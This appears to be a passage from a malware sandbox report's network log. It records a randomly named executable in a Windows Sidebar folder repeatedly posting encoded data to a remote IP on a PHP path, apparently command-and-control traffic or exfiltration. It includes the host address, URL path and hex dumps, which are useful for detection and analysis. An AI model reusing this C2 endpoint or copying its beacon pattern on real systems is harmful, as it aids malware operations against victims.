                                                                                                                                                                  Jan 3, 2025 09:08:34.778891087 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:35.129354954 CET2576OUTData Raw: 5b 51 5b 5d 58 57 50 5c 54 5b 59 5a 5b 52 57 5c 5f 50 5a 55 52 52 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q[]XWP\T[YZ[RW\_PZURRPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?-_5\0%?$@*+3%?9W6'!4;7%9#$?R+9#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:35.468282938 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  86192.168.2.45004586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:35.572487116 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:35.926263094 CET2164OUTData Raw: 5b 52 5b 5b 58 56 50 5e 54 5b 59 5a 5b 52 57 5c 5f 5c 5a 5c 52 5c 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R[[XVP^T[YZ[RW\_\Z\R\PD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(&59#2$D)53&&* $= 0]%*(C&?<#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:36.267621040 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:36.405138969 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:36 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 05 26 28 32 5d 3d 3c 23 59 27 30 31 1c 36 23 23 05 2f 1e 00 08 21 3f 25 13 32 3b 28 56 3c 2d 2d 1c 2b 23 0b 12 20 00 26 0e 2b 30 28 5d 03 10 3a 01 3d 3d 27 11 3e 10 0b 5d 2e 37 2b 5c 27 51 20 59 3e 20 25 13 26 3f 22 1e 22 3d 02 0d 3d 0a 3d 5b 27 3b 0a 19 2b 1e 33 5e 33 17 20 54 0b 17 27 1c 33 33 23 13 31 06 2d 5d 28 34 2b 00 26 3a 2d 1a 35 3f 36 52 34 17 3c 5b 2d 30 39 54 25 38 0f 1c 29 10 3f 52 31 2a 22 59 27 11 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '&(2]=<#Y'016##/!?%2;(V<--+# &+0(]:=='>].7+\'Q Y> %&?""===[';+3^3 T'33#1-](4+&:-5?6R4<[-09T%8)?R1*"Y'.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  87192.168.2.45004786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:35.693648100 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:36.051214933 CET2568OUTData Raw: 5e 52 5b 5f 58 56 50 5b 54 5b 59 5a 5b 57 57 5c 5f 55 5a 5f 52 52 50 42 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^R[_XVP[T[YZ[WW\_UZ_RRPB_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&E<>)\"\'%<3*8>Z$1Y9Q6$57]$_+'<8W+9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:36.377871037 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:36.509440899 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:36 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  88192.168.2.45005386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:36.630047083 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:36.988784075 CET2576OUTData Raw: 5e 55 5b 5a 5d 59 55 58 54 5b 59 5a 5b 51 57 59 5f 56 5a 5a 52 56 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^U[Z]YUXT[YZ[QWY_VZZRVPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&+.6:,&<8>=%45\'?*54-Q!;,[3<A3/ W+)#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:08:37.444783926 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:37.478714943 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:37 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  89192.168.2.45005986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:37.601038933 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:37.957544088 CET2568OUTData Raw: 5b 52 5b 5f 5d 5c 50 58 54 5b 59 5a 5b 57 57 5c 5f 51 5a 58 52 5d 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R[_]\PXT[YZ[WW\_QZXR]PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&A).5!*0&/8@>82075Z1Y)!!P4+ \'(B'(9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:38.281425953 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:38.410634995 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:38 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  90192.168.2.45006786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:38.539078951 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:38.895015001 CET2576OUTData Raw: 5e 51 5e 5c 5d 5b 50 50 54 5b 59 5a 5b 56 57 5f 5f 56 5a 5d 52 5c 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q^\][PPT[YZ[VW__VZ]R\PE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%)=""\/1/8D=Z3$%%:5$)P ('$)3,8R<#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:08:39.247749090 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:39.382072926 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:39 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  91192.168.2.45007586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:39.549205065 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:39.895026922 CET2576OUTData Raw: 5e 51 5b 5f 58 56 50 50 54 5b 59 5a 5b 55 57 59 5f 53 5a 58 52 55 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q[_XVPPT[YZ[UWY_SZXRUPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?X"!+& A>6^0':'?:!!W4;4$9@&<?)9#Y'$X.)
                                                                                                                                                                  Jan 3, 2025 09:08:40.236634970 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:40.366694927 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:40 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  92192.168.2.45008186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:40.491331100 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:40.848438978 CET2576OUTData Raw: 5b 54 5e 59 58 58 55 5d 54 5b 59 5a 5b 55 57 58 5f 57 5a 5a 52 5d 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^YXXU]T[YZ[UWX_WZZR]PG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&A?*!:/2?'>81%$%\2/!V!5P#;,X')'0?/(#Y'$X.)
                                                                                                                                                                  Jan 3, 2025 09:08:41.177448034 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:41.307780027 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:41 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  93192.168.2.45008686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:41.416997910 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  94192.168.2.45008786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:41.427999020 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:41.801548004 CET2576OUTData Raw: 5e 50 5b 5f 5d 59 55 5c 54 5b 59 5a 5b 53 57 5a 5f 52 5a 5c 52 52 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^P[_]YU\T[YZ[SWZ_RZ\RRPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@?5T$/')+23$-\2,)P!%Q ')3?)9#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:08:42.104958057 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:42.234074116 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:42 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  95192.168.2.45009386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:42.364219904 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:42.752501011 CET2576OUTData Raw: 5b 54 5b 5d 5d 5e 50 5b 54 5b 59 5a 5b 50 57 58 5f 51 5a 54 52 5c 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T[]]^P[T[YZ[PWX_QZTR\PI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(>1[!:,T1/8>]"^'4=&R $5T7X$*+'/#+)#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:43.041141987 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:43.170034885 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:42 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  96192.168.2.45010086.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:43.304141998 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:43.660664082 CET2576OUTData Raw: 5e 56 5b 5b 58 57 50 59 54 5b 59 5a 5b 5f 57 5f 5f 56 5a 58 52 55 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^V[[XWPYT[YZ[_W__VZXRUPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D(*!)0V%?8=*0=X%/1P!7)#8(%98&,'?#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:44.094134092 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:44.230086088 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:43 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  97192.168.2.45010486.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:44.358479977 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
